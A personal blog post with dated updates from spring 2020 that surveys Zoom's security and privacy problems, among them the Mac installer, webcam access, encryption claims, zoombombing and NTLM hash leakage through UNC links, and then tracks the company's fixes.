Zoom Technologies (ZOOM) stock trading was halted after soaring 56,000%. Wrong zoom.
Zoom, the app for video conferencing has experienced a large increase of use recently. 10 million/day > 300 million/day
Helpful <-> Harmful
The installer for zoom on MacOS installs without having a user approve.
Though not illegal or against Apple's terms and conditions, this is not normal for applications.
Zoom also allows other web sites to turn on the user's web cam via the zoom application. Zoom has indicated it will remove that feature.
Also the app indicates the app uses end-to-end encryption. Not quite More like transport encryption.
Zoom can see the data.
This post is not to advise against using zoom, just an attempt to inform, make aware, so members can prepare
Added 01-Apr-2020
this is a link to a zoom blog post on securing a virtual classroom:
Also, reports of others zoombombing zoom sessions. zoombombing is broadcasting inappropriate images, videos, hate speech, etc. into active zoom sessions.
zoom windows client will convert UNC paths to clickable links. Good for utility/functionality, bad for security.
If a user clicks of the SMB link, Windows will attempt to connect to the SMB link using the user's login name and the NTLM hash. The hash can then feed into a de-hash program yielding the user's credentials to anyone capturing the traffic. Recall from above the zoom session is NOT end-to-end encrypted - yet.
In my opinion, zoom is like almost everything in today's cyber environment. Good for us as long as users are aware so they can prepare and understand the risk to balance against the reward.
I would use zoom. You should make the decision for your circumstances.
Zoom now indicates it will work these issues.
And so they have!
Post on social media of zoom meeting ID of British cabinet. Probably NOT intended to be eavesdrop.
Update 3-Apr-2020
Update 4-Apr-2020
Zoom is actively and quickly addressing security concerns. I have little reservation for using zoom for casual usage. Efforts and techniques can be taken to make zoom sessions safer - not safe.
Update: 14-Apr-2020
Zoom now hides the meeting ID. zoom users sharing screen shots on social media could have their meeting joined if the security measures were lax. Soon users can limit the regions for their meetings.
Zoom is actively and aggressively enhancing their security and usability.
Update: 24-Apr-2020
Zoom continues to amaze with their response to security and privacy issues - in a very good way.
Explosive growth, abuse target, new features - all are addressed in a way that gives other platforms a lesson in product management.
But 500,000 meeting IDentifiers and passwords were on sole on a black market site. And 0-day exploits are also on sale for $500,000 each. Normal 0-day exploits fetch a few thousand dollars.
Update: 27-Apr-2020
Zoom version 5.0 availability A lot of improvement
GCM encryption support. Full system support to occur 30-May-2020. (re)visit zoom download page to upgrade to version 5.0
No comments:
Post a Comment